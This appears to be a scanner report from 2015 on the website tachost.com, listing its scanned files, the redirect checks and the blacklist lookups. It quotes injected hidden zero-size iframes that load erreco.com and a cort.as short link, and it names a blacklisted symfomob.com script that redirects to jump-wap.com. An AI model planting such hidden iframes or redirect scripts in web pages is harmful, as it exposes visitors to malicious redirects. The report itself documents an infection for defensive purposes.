Scanned pages/files
| Request | Server response | Status |
http://tachost.com/ | 200 OK Content-Length: 71470 Content-Type: text/html | malicious |
Page code contains blacklisted domain: symfomob.com 
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-gb" lang="en-gb" dir="ltr"> <head> <link href='http://fonts.googleapis.com/css?family=Open+Sans:800,600,400,700,300' rel='stylesheet' type='text/css' /> <link href='http://fonts.googleapis.com/css?family=Lato:400,300,700' rel='stylesheet' type='text/css' /> <meta name="viewport" content="width=dev ...[4620 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://erreco.com/traffic3.php This URL is marked by Google as suspicious <iframe src="http://erreco.com/traffic3.php" width="0" height="0" frameborder="0"> Hidden iFrame found. size: 0x0 src: http://cort.as/o2ak <iframe src="http://cort.as/o2ak" width="0" height="0" frameborder="0"> | ||
http://code.jquery.com/jquery-1.8.3.min.js | 200 OK Content-Length: 93636 Content-Type: application/x-javascript | clean |
http://tachost.com/templates/tachost/javascript/popup.js | 200 OK Content-Length: 4029 Content-Type: application/x-javascript | clean |
http://tachost.com/media/system/js/mootools-core.js | 200 OK Content-Length: 96888 Content-Type: application/x-javascript | clean |
http://tachost.com/media/system/js/core.js | 200 OK Content-Length: 4799 Content-Type: application/x-javascript | clean |
http://tachost.com/media/system/js/caption.js | 200 OK Content-Length: 733 Content-Type: application/x-javascript | clean |
http://tachost.com/media/system/js/mootools-more.js | 200 OK Content-Length: 239157 Content-Type: application/x-javascript | clean |
http://tachost.com/templates/tachost/javascript/jquery.bxslider.min.js | 200 OK Content-Length: 28680 Content-Type: application/x-javascript | clean |
http://tachost.com/templates/tachost/javascript/jquery.syncHeight.min.js | 200 OK Content-Length: 1050 Content-Type: application/x-javascript | clean |
http://tachost.com/templates/tachost/javascript/owl.carousel.js | 200 OK Content-Length: 39181 Content-Type: application/x-javascript | clean |
http://tachost.com/templates/tachost/javascript/script.js | 200 OK Content-Length: 5466 Content-Type: application/x-javascript | clean |
http://tachost.com/templates/tachost/javascript/flaunt.js | 200 OK Content-Length: 1406 Content-Type: application/x-javascript | clean |
http://tachost.com/templates/tachost/javascript/jquery.sparkbox-select.js | 200 OK Content-Length: 7082 Content-Type: application/x-javascript | clean |
http://symfomob.com/js.php?sid=1783&traffic=all&mts_land=76&beeline_land=28&megafon_land=26 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Fri, 27 Feb 2015 10:24:47 GMT Pragma: no-cache Location: http://cdn10.jump-wap.com/?sid=1783&land=26&type=js Server: nginx/1.6.2 Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=45639ad36c71c0a0e912a97332c6621f; path=/ X-Powered-By: PHP/5.3.29 | clean |
http://cdn10.jump-wap.com/?sid=1783&land=26&type=js | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://cdn10.jump-wap.com/test404page.js | 404 Not Found Content-Length: 345 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: tachost.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 27 Feb 2015 10:25:16 GMT
Pragma: no-cache
Server: Microsoft-IIS/7.5
Content-Length: 71470
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 74de2d0b92bede72ed025d2153583eba=rn2dfm0lbfve549t7bkkdiile5; path=/; domain=tachost.com
X-Powered-By: PHP/5.4.14
X-Powered-By: ASP.NET
...71470 bytes of data.
GET / HTTP/1.1
Host: tachost.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-cache
Date: Fri, 27 Feb 2015 10:25:16 GMT
Pragma: no-cache
Server: Microsoft-IIS/7.5
Content-Length: 71470
Content-Type: text/html; charset=utf-8
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 74de2d0b92bede72ed025d2153583eba=rn2dfm0lbfve549t7bkkdiile5; path=/; domain=tachost.com
X-Powered-By: PHP/5.4.14
X-Powered-By: ASP.NET
...71470 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: tachost.com
Referer: http://www.google.com/search?q=tachost.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: tachost.com
Referer: http://www.google.com/search?q=tachost.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=tachost.com
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://tachost.com/
Result: tachost.com is not infected or malware details are not published yet.
Result: tachost.com is not infected or malware details are not published yet.